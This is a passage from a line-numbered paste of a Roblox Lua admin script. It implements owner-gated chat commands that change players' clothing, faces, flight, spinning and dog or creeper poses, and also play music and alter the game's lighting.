  4283. 1428.if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  4284.  
  4285.  
  4286. 1429.end
  4287.  
  4288.  
  4289. 1430.end
  4290.  
  4291.  
  4292. 1431.end))
  4293.  
  4294.  
  4295. 1432.end
  4296.  
  4297.  
  4298. 1433.end
  4299.  
  4300.  
  4301. 1434.
  4302.  
  4303.  
  4304. 1435.if msg:lower():sub(1,6) == "pants " then
  4305.  
  4306.  
  4307. 1436.local chk1 = msg:lower():sub(7):find(" ") + 6
  4308.  
  4309.  
  4310. 1437.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  4311.  
  4312.  
  4313. 1438.for i, v in pairs(plrz) do
  4314.  
  4315.  
  4316. 1439.coroutine.resume(coroutine.create(function()
  4317.  
  4318.  
  4319. 1440.if v and v.Character then
  4320.  
  4321.  
  4322. 1441.for i,v in pairs(v.Character:children()) do
  4323.  
  4324.  
  4325. 1442.if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  4326.  
  4327.  
  4328. 1443.end
  4329.  
  4330.  
  4331. 1444.end
  4332.  
  4333.  
  4334. 1445.end))
  4335.  
  4336.  
  4337. 1446.end
  4338.  
  4339.  
  4340. 1447.end
  4341.  
  4342.  
  4343. 1448.
  4344.  
  4345.  
  4346. 1449.if msg:lower():sub(1,5) == "face " then
  4347.  
  4348.  
  4349. 1450.local chk1 = msg:lower():sub(6):find(" ") + 5
  4350.  
  4351.  
  4352. 1451.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  4353.  
  4354.  
  4355. 1452.for i, v in pairs(plrz) do
  4356.  
  4357.  
  4358. 1453.coroutine.resume(coroutine.create(function()
  4359.  
  4360.  
  4361. 1454.if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  4362.  
  4363.  
  4364. 1455.v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  4365.  
  4366.  
  4367. 1456.end
  4368.  
  4369.  
  4370. 1457.end))
  4371.  
  4372.  
  4373. 1458.end
  4374.  
  4375.  
  4376. 1459.end
  4377.  
  4378.  
  4379. 1460.
  4380.  
  4381.  
  4382. 1461.---------------------
  4383.  
  4384.  
  4385. 1462.-- FunCommands --
  4386.  
  4387.  
  4388. 1463.---------------------
  4389.  
  4390.  
  4391. 1464.if FunCommands or plr.userId == game.CreatorId or ChkOwner(plr.Name:lower()) then
  4392.  
  4393.  
  4394. 1465.
  4395.  
  4396.  
  4397. 1466.if msg:lower():sub(1,8) == "swagify " then
  4398.  
  4399.  
  4400. 1467.local plrz = GetPlr(plr, msg:lower():sub(9))
  4401.  
  4402.  
  4403. 1468.for i, v in pairs(plrz) do
  4404.  
  4405.  
  4406. 1469.coroutine.resume(coroutine.create(function()
  4407.  
  4408.  
  4409. 1470.if v and v.Character then
  4410.  
  4411.  
  4412. 1471.for i,v in pairs(v.Character:children()) do
  4413.  
  4414.  
  4415. 1472.if v.Name == "Shirt" then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=109163376" v:Destroy() end
  4416.  
  4417.  
  4418. 1473.if v.Name == "Pants" then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=109163376" v:Destroy() end
  4419.  
  4420.  
  4421. 1474.end
  4422.  
  4423.  
  4424. 1475.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  4425.  
  4426.  
  4427. 1476.local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  4428.  
  4429.  
  4430. 1477.repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  4431.  
  4432.  
  4433. 1478.local torso = plr.Character.Torso
  4434.  
  4435.  
  4436. 1479.local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  4437.  
  4438.  
  4439. 1480.p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474" p.formFactor = "Custom"
  4440.  
  4441.  
  4442. 1481.p.Size = Vector3.new(.2,.2,.2)
  4443.  
  4444.  
  4445. 1482.local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  4446.  
  4447.  
  4448. 1483.local motor1 = Instance.new("Motor", p)
  4449.  
  4450.  
  4451. 1484.motor1.Part0 = p
  4452.  
  4453.  
  4454. 1485.motor1.Part1 = torso
  4455.  
  4456.  
  4457. 1486.motor1.MaxVelocity = .01
  4458.  
  4459.  
  4460. 1487.motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  4461.  
  4462.  
  4463. 1488.motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  4464.  
  4465.  
  4466. 1489.local wave = false
  4467.  
  4468.  
  4469. 1490.repeat wait(1/44)
  4470.  
  4471.  
  4472. 1491.local ang = 0.1
  4473.  
  4474.  
  4475. 1492.local oldmag = torso.Velocity.magnitude
  4476.  
  4477.  
  4478. 1493.local mv = .002
  4479.  
  4480.  
  4481. 1494.if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  4482.  
  4483.  
  4484. 1495.ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  4485.  
  4486.  
  4487. 1496.motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  4488.  
  4489.  
  4490. 1497.motor1.DesiredAngle = -ang
  4491.  
  4492.  
  4493. 1498.if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  4494.  
  4495.  
  4496. 1499.repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  4497.  
  4498.  
  4499. 1500.if torso.Velocity.magnitude < .1 then wait(.1) end
  4500.  
  4501.  
  4502. 1501.until not p or p.Parent ~= torso.Parent
  4503.  
  4504.  
  4505. 1502.script:Destroy()
  4506.  
  4507.  
  4508. 1503.]] cl.Parent = v.PlayerGui cl.Disabled = false
  4509.  
  4510.  
  4511. 1504.end
  4512.  
  4513.  
  4514. 1505.end))
  4515.  
  4516.  
  4517. 1506.end
  4518.  
  4519.  
  4520. 1507.end
  4521.  
  4522.  
  4523. 1508.
  4524.  
  4525.  
  4526. 1509.if msg:lower():sub(1,6) == "music " then
  4527.  
  4528.  
  4529. 1510.for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  4530.  
  4531.  
  4532. 1511.local id = msg:sub(7)
  4533.  
  4534.  
  4535. 1512.local pitch = 1
  4536.  
  4537.  
  4538. 1513.if tostring(id):lower():find("caramell") then id = 2303479 end
  4539.  
  4540.  
  4541. 1514.if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  4542.  
  4543.  
  4544. 1515.if tostring(id):find("rick") then id = 2027611 end
  4545.  
  4546.  
  4547. 1516.if tostring(id):find("halo") then id = 1034065 end
  4548.  
  4549.  
  4550. 1517.if tostring(id):find("pokemon") then id = 1372261 end
  4551.  
  4552.  
  4553. 1518.if tostring(id):find("cursed") then id = 1372257 end
  4554.  
  4555.  
  4556. 1519.if tostring(id):find("extreme") then id = 11420933 end
  4557.  
  4558.  
  4559. 1520.if tostring(id):find("awaken") then id = 27697277 end
  4560.  
  4561.  
  4562. 1521.if tostring(id):find("alone") then id = 27697392 end
  4563.  
  4564.  
  4565. 1522.if tostring(id):find("mario") then id = 1280470 end
  4566.  
  4567.  
  4568. 1523.if tostring(id):find("choir") then id = 1372258 end
  4569.  
  4570.  
  4571. 1524.if tostring(id):find("chrono") then id = 1280463 end
  4572.  
  4573.  
  4574. 1525.if tostring(id):find("dotr") then id = 11420922 end
  4575.  
  4576.  
  4577. 1526.if tostring(id):find("entertain") then id = 27697267 end
  4578.  
  4579.  
  4580. 1527.if tostring(id):find("fantasy") then id = 1280473 end
  4581.  
  4582.  
  4583. 1528.if tostring(id):find("final") then id = 1280414 end
  4584.  
  4585.  
  4586. 1529.if tostring(id):find("emblem") then id = 1372259 end
  4587.  
  4588.  
  4589. 1530.if tostring(id):find("flight") then id = 27697719 end
  4590.  
  4591.  
  4592. 1531.if tostring(id):find("banjo") then id = 27697298 end
  4593.  
  4594.  
  4595. 1532.if tostring(id):find("gothic") then id = 27697743 end
  4596.  
  4597.  
  4598. 1533.if tostring(id):find("hiphop") then id = 27697735 end
  4599.  
  4600.  
  4601. 1534.if tostring(id):find("intro") then id = 27697707 end
  4602.  
  4603.  
  4604. 1535.if tostring(id):find("mule") then id = 1077604 end
  4605.  
  4606.  
  4607. 1536.if tostring(id):find("film") then id = 27697713 end
  4608.  
  4609.  
  4610. 1537.if tostring(id):find("nezz") then id = 8610025 end
  4611.  
  4612.  
  4613. 1538.if tostring(id):find("angel") then id = 1372260 end
  4614.  
  4615.  
  4616. 1539.if tostring(id):find("resist") then id = 27697234 end
  4617.  
  4618.  
  4619. 1540.if tostring(id):find("schala") then id = 5985787 end
  4620.  
  4621.  
  4622. 1541.if tostring(id):find("organ") then id = 11231513 end
  4623.  
  4624.  
  4625. 1542.if tostring(id):find("tunnel") then id = 9650822 end
  4626.  
  4627.  
  4628. 1543.if tostring(id):find("spanish") then id = 5982975 end
  4629.  
  4630.  
  4631. 1544.if tostring(id):find("venom") then id = 1372262 end
  4632.  
  4633.  
  4634. 1545.if tostring(id):find("wind") then id = 1015394 end
  4635.  
  4636.  
  4637. 1546.if tostring(id):find("guitar") then id = 5986151 end
  4638.  
  4639.  
  4640. 1547.local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  4641.  
  4642.  
  4643. 1548.end
  4644.  
  4645.  
  4646. 1549.
  4647.  
  4648.  
  4649. 1550.if msg:lower() == "stopmusic" then
  4650.  
  4651.  
  4652. 1551.for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  4653.  
  4654.  
  4655. 1552.end
  4656.  
  4657.  
  4658. 1553.
  4659.  
  4660.  
  4661. 1554.if msg:lower() == "musiclist" then
  4662.  
  4663.  
  4664. 1555.if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  4665.  
  4666.  
  4667. 1556.local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  4668.  
  4669.  
  4670. 1557.local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  4671.  
  4672.  
  4673. 1558.for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  4674.  
  4675.  
  4676. 1559.end
  4677.  
  4678.  
  4679. 1560.
  4680.  
  4681.  
  4682. 1561.if msg:lower():sub(1,4) == "fly " then
  4683.  
  4684.  
  4685. 1562.local plrz = GetPlr(plr, msg:lower():sub(5))
  4686.  
  4687.  
  4688. 1563.for i, v in pairs(plrz) do
  4689.  
  4690.  
  4691. 1564.coroutine.resume(coroutine.create(function()
  4692.  
  4693.  
  4694. 1565.if v and v:findFirstChild("PlayerGui") then
  4695.  
  4696.  
  4697. 1566.local cl = script.LocalScriptBase:Clone() cl.Name = "FlyScript" cl.Code.Value = [[repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")
  4698.  
  4699.  
  4700. 1567.local mouse = game.Players.LocalPlayer:GetMouse()
  4701.  
  4702.  
  4703. 1568.repeat wait() until mouse
  4704.  
  4705.  
  4706. 1569.local plr = game.Players.LocalPlayer
  4707.  
  4708.  
  4709. 1570.local torso = plr.Character.Torso
  4710.  
  4711.  
  4712. 1571.local flying = true
  4713.  
  4714.  
  4715. 1572.local deb = true
  4716.  
  4717.  
  4718. 1573.local ctrl = {f = 0, b = 0, l = 0, r = 0}
  4719.  
  4720.  
  4721. 1574.local lastctrl = {f = 0, b = 0, l = 0, r = 0}
  4722.  
  4723.  
  4724. 1575.local maxspeed = 50
  4725.  
  4726.  
  4727. 1576.local speed = 0
  4728.  
  4729.  
  4730. 1577.function Fly()
  4731.  
  4732.  
  4733. 1578.local bg = Instance.new("BodyGyro", torso)
  4734.  
  4735.  
  4736. 1579.bg.P = 9e4
  4737.  
  4738.  
  4739. 1580.bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  4740.  
  4741.  
  4742. 1581.bg.cframe = torso.CFrame
  4743.  
  4744.  
  4745. 1582.local bv = Instance.new("BodyVelocity", torso)
  4746.  
  4747.  
  4748. 1583.bv.velocity = Vector3.new(0,0.1,0)
  4749.  
  4750.  
  4751. 1584.bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
  4752.  
  4753.  
  4754. 1585.repeat wait()
  4755.  
  4756.  
  4757. 1586.plr.Character.Humanoid.PlatformStand = true
  4758.  
  4759.  
  4760. 1587.if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
  4761.  
  4762.  
  4763. 1588.speed = speed+.5+(speed/maxspeed)
  4764.  
  4765.  
  4766. 1589.if speed > maxspeed then
  4767.  
  4768.  
  4769. 1590.speed = maxspeed
  4770.  
  4771.  
  4772. 1591.end
  4773.  
  4774.  
  4775. 1592.elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
  4776.  
  4777.  
  4778. 1593.speed = speed-1
  4779.  
  4780.  
  4781. 1594.if speed < 0 then
  4782.  
  4783.  
  4784. 1595.speed = 0
  4785.  
  4786.  
  4787. 1596.end
  4788.  
  4789.  
  4790. 1597.end
  4791.  
  4792.  
  4793. 1598.if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
  4794.  
  4795.  
  4796. 1599.bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  4797.  
  4798.  
  4799. 1600.lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
  4800.  
  4801.  
  4802. 1601.elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
  4803.  
  4804.  
  4805. 1602.bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  4806.  
  4807.  
  4808. 1603.else
  4809.  
  4810.  
  4811. 1604.bv.velocity = Vector3.new(0,0.1,0)
  4812.  
  4813.  
  4814. 1605.end
  4815.  
  4816.  
  4817. 1606.bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
  4818.  
  4819.  
  4820. 1607.until not flying
  4821.  
  4822.  
  4823. 1608.ctrl = {f = 0, b = 0, l = 0, r = 0}
  4824.  
  4825.  
  4826. 1609.lastctrl = {f = 0, b = 0, l = 0, r = 0}
  4827.  
  4828.  
  4829. 1610.speed = 0
  4830.  
  4831.  
  4832. 1611.bg:Destroy()
  4833.  
  4834.  
  4835. 1612.bv:Destroy()
  4836.  
  4837.  
  4838. 1613.plr.Character.Humanoid.PlatformStand = false
  4839.  
  4840.  
  4841. 1614.end
  4842.  
  4843.  
  4844. 1615.mouse.KeyDown:connect(function(key)
  4845.  
  4846.  
  4847. 1616.if key:lower() == "e" then
  4848.  
  4849.  
  4850. 1617.if flying then flying = false
  4851.  
  4852.  
  4853. 1618.else
  4854.  
  4855.  
  4856. 1619.flying = true
  4857.  
  4858.  
  4859. 1620.Fly()
  4860.  
  4861.  
  4862. 1621.end
  4863.  
  4864.  
  4865. 1622.elseif key:lower() == "w" then
  4866.  
  4867.  
  4868. 1623.ctrl.f = 1
  4869.  
  4870.  
  4871. 1624.elseif key:lower() == "s" then
  4872.  
  4873.  
  4874. 1625.ctrl.b = -1
  4875.  
  4876.  
  4877. 1626.elseif key:lower() == "a" then
  4878.  
  4879.  
  4880. 1627.ctrl.l = -1
  4881.  
  4882.  
  4883. 1628.elseif key:lower() == "d" then
  4884.  
  4885.  
  4886. 1629.ctrl.r = 1
  4887.  
  4888.  
  4889. 1630.end
  4890.  
  4891.  
  4892. 1631.end)
  4893.  
  4894.  
  4895. 1632.mouse.KeyUp:connect(function(key)
  4896.  
  4897.  
  4898. 1633.if key:lower() == "w" then
  4899.  
  4900.  
  4901. 1634.ctrl.f = 0
  4902.  
  4903.  
  4904. 1635.elseif key:lower() == "s" then
  4905.  
  4906.  
  4907. 1636.ctrl.b = 0
  4908.  
  4909.  
  4910. 1637.elseif key:lower() == "a" then
  4911.  
  4912.  
  4913. 1638.ctrl.l = 0
  4914.  
  4915.  
  4916. 1639.elseif key:lower() == "d" then
  4917.  
  4918.  
  4919. 1640.ctrl.r = 0
  4920.  
  4921.  
  4922. 1641.end
  4923.  
  4924.  
  4925. 1642.end)
  4926.  
  4927.  
  4928. 1643.Fly()]]
  4929.  
  4930.  
  4931. 1644.cl.Parent = v.PlayerGui cl.Disabled = false
  4932.  
  4933.  
  4934. 1645.end
  4935.  
  4936.  
  4937. 1646.end))
  4938.  
  4939.  
  4940. 1647.end
  4941.  
  4942.  
  4943. 1648.end
  4944.  
  4945.  
  4946. 1649.
  4947.  
  4948.  
  4949. 1650.if msg:lower():sub(1,6) == "unfly " then
  4950.  
  4951.  
  4952. 1651.local plrz = GetPlr(plr, msg:lower():sub(7))
  4953.  
  4954.  
  4955. 1652.for i, v in pairs(plrz) do
  4956.  
  4957.  
  4958. 1653.coroutine.resume(coroutine.create(function()
  4959.  
  4960.  
  4961. 1654.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  4962.  
  4963.  
  4964. 1655.for a, q in pairs(v.PlayerGui:children()) do if q.Name == "FlyScript" then q:Destroy() end end
  4965.  
  4966.  
  4967. 1656.for a, q in pairs(v.Character.Torso:children()) do if q.Name == "BodyGyro" or q.Name == "BodyVelocity" then q:Destroy() end end
  4968.  
  4969.  
  4970. 1657.wait(.1) v.Character.Humanoid.PlatformStand = false
  4971.  
  4972.  
  4973. 1658.end
  4974.  
  4975.  
  4976. 1659.end))
  4977.  
  4978.  
  4979. 1660.end
  4980.  
  4981.  
  4982. 1661.end
  4983.  
  4984.  
  4985. 1662.
  4986.  
  4987.  
  4988. 1663.if msg:lower() == "disco" then
  4989.  
  4990.  
  4991. 1664.for i, v in pairs(lobjs) do v:Destroy() end
  4992.  
  4993.  
  4994. 1665.local cl = script.ScriptBase:Clone() cl.Name = "LightEdit" cl.Code.Value = [[repeat wait(.1) local color = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255)
  4995.  
  4996.  
  4997. 1666.game.Lighting.Ambient = color
  4998.  
  4999.  
  5000. 1667.game.Lighting.FogColor = color
  5001.  
  5002.  
  5003. 1668.until nil]]
  5004.  
  5005.  
  5006. 1669.table.insert(lobjs, cl) cl.Parent = game.Workspace cl.Disabled = false
  5007.  
  5008.  
  5009. 1670.end
  5010.  
  5011.  
  5012. 1671.
  5013.  
  5014.  
  5015. 1672.if msg:lower() == "flash" then
  5016.  
  5017.  
  5018. 1673.for i, v in pairs(lobjs) do v:Destroy() end
  5019.  
  5020.  
  5021. 1674.local cl = script.ScriptBase:Clone() cl.Name = "LightEdit" cl.Code.Value = [[repeat wait(.1)
  5022.  
  5023.  
  5024. 1675.game.Lighting.Ambient = Color3.new(1,1,1)
  5025.  
  5026.  
  5027. 1676.game.Lighting.FogColor = Color3.new(1,1,1)
  5028.  
  5029.  
  5030. 1677.game.Lighting.Brightness = 1
  5031.  
  5032.  
  5033. 1678.game.Lighting.TimeOfDay = 14
  5034.  
  5035.  
  5036. 1679.wait(.1)
  5037.  
  5038.  
  5039. 1680.game.Lighting.Ambient = Color3.new(0,0,0)
  5040.  
  5041.  
  5042. 1681.game.Lighting.FogColor = Color3.new(0,0,0)
  5043.  
  5044.  
  5045. 1682.game.Lighting.Brightness = 0
  5046.  
  5047.  
  5048. 1683.game.Lighting.TimeOfDay = 0
  5049.  
  5050.  
  5051. 1684.until nil]]
  5052.  
  5053.  
  5054. 1685.table.insert(lobjs, cl) cl.Parent = game.Workspace cl.Disabled = false
  5055.  
  5056.  
  5057. 1686.end
  5058.  
  5059.  
  5060. 1687.
  5061.  
  5062.  
  5063. 1688.if msg:lower():sub(1,5) == "spin " then
  5064.  
  5065.  
  5066. 1689.local plrz = GetPlr(plr, msg:lower():sub(6))
  5067.  
  5068.  
  5069. 1690.for i, v in pairs(plrz) do
  5070.  
  5071.  
  5072. 1691.coroutine.resume(coroutine.create(function()
  5073.  
  5074.  
  5075. 1692.if v and v.Character and v.Character:findFirstChild("Torso") then
  5076.  
  5077.  
  5078. 1693.for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  5079.  
  5080.  
  5081. 1694.local torso = v.Character:findFirstChild("Torso")
  5082.  
  5083.  
  5084. 1695.local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  5085.  
  5086.  
  5087. 1696.repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  5088.  
  5089.  
  5090. 1697.until not bg or bg.Parent ~= torso
  5091.  
  5092.  
  5093. 1698.end
  5094.  
  5095.  
  5096. 1699.end))
  5097.  
  5098.  
  5099. 1700.end
  5100.  
  5101.  
  5102. 1701.end
  5103.  
  5104.  
  5105. 1702.
  5106.  
  5107.  
  5108. 1703.if msg:lower():sub(1,7) == "unspin " then
  5109.  
  5110.  
  5111. 1704.local plrz = GetPlr(plr, msg:lower():sub(8))
  5112.  
  5113.  
  5114. 1705.for i, v in pairs(plrz) do
  5115.  
  5116.  
  5117. 1706.coroutine.resume(coroutine.create(function()
  5118.  
  5119.  
  5120. 1707.if v and v.Character and v.Character:findFirstChild("Torso") then
  5121.  
  5122.  
  5123. 1708.for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  5124.  
  5125.  
  5126. 1709.end
  5127.  
  5128.  
  5129. 1710.end))
  5130.  
  5131.  
  5132. 1711.end
  5133.  
  5134.  
  5135. 1712.end
  5136.  
  5137.  
  5138. 1713.
  5139.  
  5140.  
  5141. 1714.if msg:lower():sub(1,4) == "dog " then
  5142.  
  5143.  
  5144. 1715.local plrz = GetPlr(plr, msg:lower():sub(5))
  5145.  
  5146.  
  5147. 1716.for i, v in pairs(plrz) do
  5148.  
  5149.  
  5150. 1717.coroutine.resume(coroutine.create(function()
  5151.  
  5152.  
  5153. 1718.if v and v.Character and v.Character:findFirstChild("Torso") then
  5154.  
  5155.  
  5156. 1719.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5157.  
  5158.  
  5159. 1720.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5160.  
  5161.  
  5162. 1721.v.Character.Torso.Transparency = 1
  5163.  
  5164.  
  5165. 1722.v.Character.Torso.Neck.C0 = CFrame.new(0,-.5,-2) * CFrame.Angles(math.rad(90),math.rad(180),0)
  5166.  
  5167.  
  5168. 1723.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(.5,-1.5,-1.5) * CFrame.Angles(0,math.rad(90),0)
  5169.  
  5170.  
  5171. 1724.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-.5,-1.5,-1.5) * CFrame.Angles(0,math.rad(-90),0)
  5172.  
  5173.  
  5174. 1725.v.Character.Torso["Right Hip"].C0 = CFrame.new(1.5,-1,1.5) * CFrame.Angles(0,math.rad(90),0)
  5175.  
  5176.  
  5177. 1726.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1.5,-1,1.5) * CFrame.Angles(0,math.rad(-90),0)
  5178.  
  5179.  
  5180. 1727.local new = Instance.new("Seat", v.Character) new.Name = "FAKETORSO" new.formFactor = "Symmetric" new.TopSurface = 0 new.BottomSurface = 0 new.Size = Vector3.new(3,1,4) new.CFrame = v.Character.Torso.CFrame
  5181.  
  5182.  
  5183. 1728.local bf = Instance.new("BodyForce", new) bf.force = Vector3.new(0,new:GetMass()*196.25,0)
  5184.  
  5185.  
  5186. 1729.local weld = Instance.new("Weld", v.Character.Torso) weld.Part0 = v.Character.Torso weld.Part1 = new weld.C0 = CFrame.new(0,-.5,0)
  5187.  
  5188.  
  5189. 1730.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor = BrickColor.new("Brown") elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("Brown") end end
  5190.  
  5191.  
  5192. 1731.end
  5193.  
  5194.  
  5195. 1732.end))
  5196.  
  5197.  
  5198. 1733.end
  5199.  
  5200.  
  5201. 1734.end
  5202.  
  5203.  
  5204. 1735.
  5205.  
  5206.  
  5207. 1736.if msg:lower():sub(1,6) == "undog " then
  5208.  
  5209.  
  5210. 1737.local plrz = GetPlr(plr, msg:lower():sub(7))
  5211.  
  5212.  
  5213. 1738.for i, v in pairs(plrz) do
  5214.  
  5215.  
  5216. 1739.coroutine.resume(coroutine.create(function()
  5217.  
  5218.  
  5219. 1740.if v and v.Character and v.Character:findFirstChild("Torso") then
  5220.  
  5221.  
  5222. 1741.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  5223.  
  5224.  
  5225. 1742.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  5226.  
  5227.  
  5228. 1743.v.Character.Torso.Transparency = 0
  5229.  
  5230.  
  5231. 1744.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  5232.  
  5233.  
  5234. 1745.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  5235.  
  5236.  
  5237. 1746.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  5238.  
  5239.  
  5240. 1747.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  5241.  
  5242.  
  5243. 1748.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  5244.  
  5245.  
  5246. 1749.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor = BrickColor.new("White") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("White") end end
  5247.  
  5248.  
  5249. 1750.end
  5250.  
  5251.  
  5252. 1751.end))
  5253.  
  5254.  
  5255. 1752.end
  5256.  
  5257.  
  5258. 1753.end
  5259.  
  5260.  
  5261. 1754.
  5262.  
  5263.  
  5264. 1755.if msg:lower():sub(1,8) == "creeper " then
  5265.  
  5266.  
  5267. 1756.local plrz = GetPlr(plr, msg:lower():sub(9))
  5268.  
  5269.  
  5270. 1757.for i, v in pairs(plrz) do
  5271.  
  5272.  
  5273. 1758.coroutine.resume(coroutine.create(function()
  5274.  
  5275.  
  5276. 1759.if v and v.Character and v.Character:findFirstChild("Torso") then
  5277.  
  5278.  
  5279. 1760.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5280.  
  5281.  
  5282. 1761.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5283.  
  5284.  
  5285. 1762.v.Character.Torso.Transparency = 0
  5286.  
  5287.  
  5288. 1763.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  5289.  
  5290.  
  5291. 1764.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(0,-1.5,-.5) * CFrame.Angles(0,math.rad(90),0)
  5292.  
  5293.  
  5294. 1765.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(0,-1.5,-.5) * CFrame.Angles(0,math.rad(-90),0)
  5295.  
  5296.  
  5297. 1766.v.Character.Torso["Right Hip"].C0 = CFrame.new(0,-1,.5) * CFrame.Angles(0,math.rad(90),0)
  5298.  
  5299.  
  5300. 1767.v.Character.Torso["Left Hip"].C0 = CFrame.new(0,-1,.5) * CFrame.Angles(0,math.rad(-90),0)
  5301.  
  5302.  
